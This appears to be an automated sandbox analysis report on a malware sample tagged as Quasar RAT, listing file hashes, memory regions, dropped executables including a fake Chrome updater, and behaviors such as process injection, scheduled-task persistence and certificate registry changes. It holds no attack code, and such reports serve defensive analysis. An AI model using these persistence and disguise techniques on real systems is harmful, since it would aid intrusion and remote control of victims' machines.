C:\Users\Admin\AppData\Local\Temp\UI.exe

MD5 a6d1f2686c50110de2fd76df4dcb7057
SHA1 75f47ac32fada1bb9371b45006c2b1744347790a
SHA256 ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446
SHA512 f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66

C:\Users\Admin\AppData\Local\Temp\GC.exe

MD5 b2bcd053c6452f8a04ba108d850f9781
SHA1 d69a9b01e46a84347317f93898c270b0df1fd4ca
SHA256 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec
SHA512 e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe

C:\Users\Admin\AppData\Local\Temp\GC.exe

MD5 b2bcd053c6452f8a04ba108d850f9781
SHA1 d69a9b01e46a84347317f93898c270b0df1fd4ca
SHA256 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec
SHA512 e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe

memory/796-66-0x000007FEF5B10000-0x000007FEF64FC000-memory.dmp

memory/1736-68-0x000007FEF5B10000-0x000007FEF64FC000-memory.dmp

memory/1736-67-0x0000000000B40000-0x0000000000E64000-memory.dmp

memory/796-69-0x000007FEF5B10000-0x000007FEF64FC000-memory.dmp

memory/2040-70-0x00000000002B0000-0x0000000000326000-memory.dmp

memory/2040-71-0x0000000074740000-0x0000000074E2E000-memory.dmp

memory/1736-72-0x000000001B3F0000-0x000000001B470000-memory.dmp

memory/2040-74-0x0000000004A30000-0x0000000004A70000-memory.dmp

memory/2492-95-0x000000013F030000-0x00000001428BE000-memory.dmp

memory/2040-96-0x0000000004A30000-0x0000000004A70000-memory.dmp

memory/2040-97-0x0000000074740000-0x0000000074E2E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c9ab725df7ac69aea672060fe6b3b455
SHA1 696ec9158c738053cd5aa7be954cd044bd6bc342
SHA256 3447939b787f57ef04d6dc15cdea1a21ad841aba6c69e1a60fea0e924d0f2f43
SHA512 38fa0bcd81f2a843ed898ae57ffd30fbd4a78ee326afc699792ce5c79b375f1c1da0ca8004f63e6e672bf7b3a38b22a3283efae2d869a27b1d9dca5bf5cd284f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1M6RKDWZFAF9BT382SJ6.temp

MD5 c9ab725df7ac69aea672060fe6b3b455
SHA1 696ec9158c738053cd5aa7be954cd044bd6bc342
SHA256 3447939b787f57ef04d6dc15cdea1a21ad841aba6c69e1a60fea0e924d0f2f43
SHA512 38fa0bcd81f2a843ed898ae57ffd30fbd4a78ee326afc699792ce5c79b375f1c1da0ca8004f63e6e672bf7b3a38b22a3283efae2d869a27b1d9dca5bf5cd284f

memory/2604-104-0x000000001B120000-0x000000001B402000-memory.dmp

memory/2604-105-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/1736-103-0x000007FEF5B10000-0x000007FEF64FC000-memory.dmp

memory/2604-106-0x0000000002320000-0x0000000002328000-memory.dmp

memory/2604-107-0x000007FEED580000-0x000007FEEDF1D000-memory.dmp

memory/2492-108-0x000000013F030000-0x00000001428BE000-memory.dmp

memory/2604-109-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2604-110-0x000007FEED580000-0x000007FEEDF1D000-memory.dmp

memory/2604-111-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/1736-112-0x000000001B3F0000-0x000000001B470000-memory.dmp

memory/2604-113-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2604-114-0x000007FEED580000-0x000007FEEDF1D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c9ab725df7ac69aea672060fe6b3b455
SHA1 696ec9158c738053cd5aa7be954cd044bd6bc342
SHA256 3447939b787f57ef04d6dc15cdea1a21ad841aba6c69e1a60fea0e924d0f2f43
SHA512 38fa0bcd81f2a843ed898ae57ffd30fbd4a78ee326afc699792ce5c79b375f1c1da0ca8004f63e6e672bf7b3a38b22a3283efae2d869a27b1d9dca5bf5cd284f

memory/1404-121-0x000000001B200000-0x000000001B4E2000-memory.dmp

memory/2040-120-0x0000000004A30000-0x0000000004A70000-memory.dmp

memory/1404-122-0x000007FEECBE0000-0x000007FEED57D000-memory.dmp

memory/1404-123-0x0000000002510000-0x0000000002518000-memory.dmp

memory/1404-124-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1404-125-0x000007FEECBE0000-0x000007FEED57D000-memory.dmp

memory/1404-126-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1404-127-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1404-128-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/2492-129-0x000000013F030000-0x00000001428BE000-memory.dmp

memory/2040-130-0x0000000004A30000-0x0000000004A70000-memory.dmp

memory/1404-131-0x000007FEECBE0000-0x000007FEED57D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mainPannel.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

memory/2492-134-0x000000013F030000-0x00000001428BE000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

C:\Program Files\Google\Chrome\updater.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

C:\Program Files\Google\Chrome\updater.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

memory/2256-138-0x000000013F7B0000-0x000000014303E000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/312-141-0x0000000001310000-0x0000000001390000-memory.dmp

memory/312-140-0x000007FEED580000-0x000007FEEDF1D000-memory.dmp

memory/312-142-0x0000000001310000-0x0000000001390000-memory.dmp

memory/312-143-0x000007FEED580000-0x000007FEEDF1D000-memory.dmp

memory/312-144-0x0000000001310000-0x0000000001390000-memory.dmp

memory/312-147-0x000007FEED580000-0x000007FEEDF1D000-memory.dmp

memory/2256-146-0x000000013F7B0000-0x000000014303E000-memory.dmp

memory/1452-148-0x000007FEECBE0000-0x000007FEED57D000-memory.dmp

memory/1452-151-0x0000000000DE0000-0x0000000000E60000-memory.dmp

memory/1452-150-0x0000000000DE0000-0x0000000000E60000-memory.dmp

memory/1452-149-0x0000000000DE0000-0x0000000000E60000-memory.dmp

memory/1452-152-0x000007FEECBE0000-0x000007FEED57D000-memory.dmp

memory/1452-153-0x0000000000DE0000-0x0000000000E60000-memory.dmp

memory/1452-154-0x000007FEECBE0000-0x000007FEED57D000-memory.dmp

memory/3004-159-0x00000000001C0000-0x00000000001E0000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

memory/2256-160-0x000000013F7B0000-0x000000014303E000-memory.dmp

memory/1196-161-0x0000000140000000-0x000000014002A000-memory.dmp

memory/3004-162-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/3004-163-0x0000000000480000-0x00000000004A0000-memory.dmp

memory/3004-165-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/3004-166-0x0000000000480000-0x00000000004A0000-memory.dmp

memory/1196-167-0x0000000140000000-0x000000014002A000-memory.dmp

memory/3004-168-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/3004-170-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/3004-172-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/3004-174-0x0000000140000000-0x00000001407EF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-10 03:52

Reported

2023-09-10 03:55

Platform

win10v2004-20230831-en

Max time kernel

151s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1344 created 3168 N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe C:\Windows\Explorer.EXE
PID 1344 created 3168 N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe C:\Windows\Explorer.EXE
PID 1344 created 3168 N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe C:\Windows\Explorer.EXE
PID 1344 created 3168 N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe C:\Windows\Explorer.EXE
PID 4996 created 3168 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4996 created 3168 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4996 created 3168 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4996 created 3168 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4996 created 3168 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4272677097-406801653-1594978504-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\UI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GC.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4996 set thread context of 4576 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4996 set thread context of 1092 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\cmd.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
